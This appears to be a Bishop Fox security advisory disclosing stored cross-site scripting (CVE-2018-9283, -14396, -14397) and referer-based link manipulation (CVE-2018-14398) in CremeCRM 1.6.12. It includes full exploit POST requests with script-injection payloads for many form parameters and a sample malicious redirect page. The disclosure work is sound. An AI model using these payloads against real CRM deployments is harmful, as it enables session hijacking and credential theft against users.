CremeCRM 1.6.12 - Multiple Vulnerabilities

Gauge showing high severity reading

Share

CremeCRM Advisory Summary

Product Description

CremeCRM is an open source CRM. It allows organizations to manage business data concerning customers, invoices, orders, and products. Its official website is www.cremecrm.com, and source code can be obtained on bitbucket.org/hybrid/. Version 1.6.12 was released on July 28, 2017.

Vulnerabilities List

Two vulnerabilities were identified within the CremeCRM web application:

  • 29 instances of stored cross-site scripting
  • One instance of reflected link manipulation

These vulnerabilities are described in the following sections.

Affected Version

Version 1.6.12

Solution

Update to version 1.8.0


CremeCRM 1.6.12  Vulnerabilities

Stored Cross-Site Scripting

The CremeCRM web application is affected by 29 stored cross-site scripting (XSS) instances split into three different features. These instances are stored within the application database and allow the execution of a JavaScript payload each time a client visits an infected page. To trigger these instances, a user account is needed.

Vulnerability Details

CVE ID: CVE-2018-9283, CVE-2018-14396, CVE-2018-14397

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Stored Cross-site Scripting On Contact Creation Page (CVE-2018-9283)

Ten XSS instances are located in the contact creation and modification page. By injecting a JavaScript payload into the weak parameters of the vulnerable page, an attacker can use these instances to manipulate user sessions. The weak parameters are firstname, lastname, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerability. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script>

The request below could be used to exploit the instances:

POST /persons/contact/add HTTP/1.1

Host: HOST

Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2Fcreme_config%2Fmy_settings%2F&user=1&civility=&last_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Flastname%2F%29%3C%2Fscript%3E&first_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Ffirstname%2F%29%3C%2Fscript%3E&description=&position=&full_position=§or=&birthday=&image=&skype=&phone=&mobile=&fax=&email=&url_site=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingAddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingCity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingDepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingAddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingCity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingDepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=


Stored Cross-Site Scripting on Salesman Page (CVE-2018-14396)

Ten XSS instances are located in the salesman creation and modification page. By injecting a JavaScript payload, an attacker can use these instances to manipulate user sessions. The weak parameters are firstname, lastname, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerability. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script>

The request below could be used to exploit the instances:

POST /commercial/salesman/add HTTP/1.1

Host: HOST

Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2Fcreme_config%2Fmy_settings%2F&user=1&civility=&last_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Flastname%2F%29%3C%2Fscript%3E&first_name==%3C%2Fscript%3E%3Cscript%3Ealert%28%2Ffirstname%2F%29%3C%2Fscript%3E&description=&position=&full_position=§or=&birthday=&image=&skype=&phone=&mobile=&fax=&email=&url_site=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingAddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingCity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FBillingDepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingAddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingCity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FShippingDepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=

Stored Cross-site Scripting On Organization Page (CVE-2018-14397)

Nine XSS vulnerabilities are located in the organization creation and modification page. By injecting a JavaScript payload, an attacker can use these instances to manipulate user sessions. The weak parameters are name, billing_address-address, billing_address-zipcode, billing_address-city, billing_address-department, shipping_address-address, shipping_address-zipcode, shipping_address-city, and shipping_address-department. A billing or shipping address must be defined to trigger the vulnerabilities. To demonstrate the attack, the following payload can be used for each parameter:

</script><script>alert(document.domain)</script

The request below can be used to exploit the instances:

POST /persons/organisation/add HTTP/1.1

Host: HOST

Cookie: csrftoken=CSRFTOKEN1; sessionid=SESSIONID

Connection: close

Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=CSRFTOKEN2&cancel_url=http%3A%2F%2FHOST%2F&user=1&name=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&phone=&fax=&email=&url_site=§or=&capital=&siren=&naf=&siret=&rcs=&tvaintra=&subject_to_vat=on&legal_form=&staff_size=&annual_revenue=&description=&creation_date=&image=&billing_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingaddress%2F%29%3C%2Fscript%3E&billing_address-po_box=&billing_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingzipcode%2F%29%3C%2Fscript%3E&billing_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingcity%2F%29%3C%2Fscript%3E&billing_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fbillingdepartement%2F%29%3C%2Fscript%3E&billing_address-state=&billing_address-country=&shipping_address-address=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingaddress%2F%29%3C%2Fscript%3E&shipping_address-po_box=&shipping_address-zipcode=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingzipcode%2F%29%3C%2Fscript%3E&shipping_address-city=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingcity%2F%29%3C%2Fscript%3E&shipping_address-department=%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fshippingdepartement%2F%29%3C%2Fscript%3E&shipping_address-state=&shipping_address-country=shipping_address-state=&shipping_address-country=

Reflected Link Manipulation

The CremeCRM web application is vulnerable to reflected link manipulation. This vulnerability allows an attacker to manipulate the URL used by the application when an action is canceled.

Vulnerability Details

CVE ID: CVE-2018-14398

Access Vector: Remote

Security Risk: Medium

Vulnerability: CWE-73

CVSS Base Score: 4.3

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

An attacker can exploit this vulnerability by driving a user to a malicious website, which can then redirect the user to the targeted CremeCRM application on a modification page (e.g., the contact or salesman page). Because the Cancel button link uses the HTTP Referer header to redirect the user to a previous page, the application will redirect a user who clicks on the Cancel button to the malicious website. The malicious website could detect that the user is redirected and supply a fake CremeCRM authentication page in order to steal their credentials. This attack requires the victim to be authenticated in order for the attacker to interact with them.

The code below is an example of a malicious website that could be used to demonstrate the vulnerability:

<html>

<head>

<title>Link manipulation</title>

</head>

<body>

<script>

    var expression = /http:\/\/HOST/gi;

    var ref = document.referrer;

    if(ref.match(expression)){

document.write('Malicious website');

    } else {

document.write('<a href="http://HOST/billing/sales_order/add">ClicHere</a>');

    }

</script>

</body>

</html>

By following the link given by the malicious website, the user will arrive on an edition form of the application (in the example above, the sales order creation form). The Cancel button will use the HTTP Referer header:

BishopFox Advisory CremeCRM showing the Cancel button using the HTTP Referer header:

If the user clicks on the Cancel button, they will be redirected to the malicious page.

Disclosure Timeline:

  • 10/1/2017: Initial discovery
  • 2/12/2018: Patch published by the vendor
  • 7/19/2018: Vulnerabilities publicly disclosed

Researcher:

Florian Nivette, Security Associate at Bishop Fox 

For Reference:

CVE-2018-9283

CVE-2018-14396

CVE-2018-14397

CVE-2018-14398

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Florian nivette

About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.

More by Florian

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.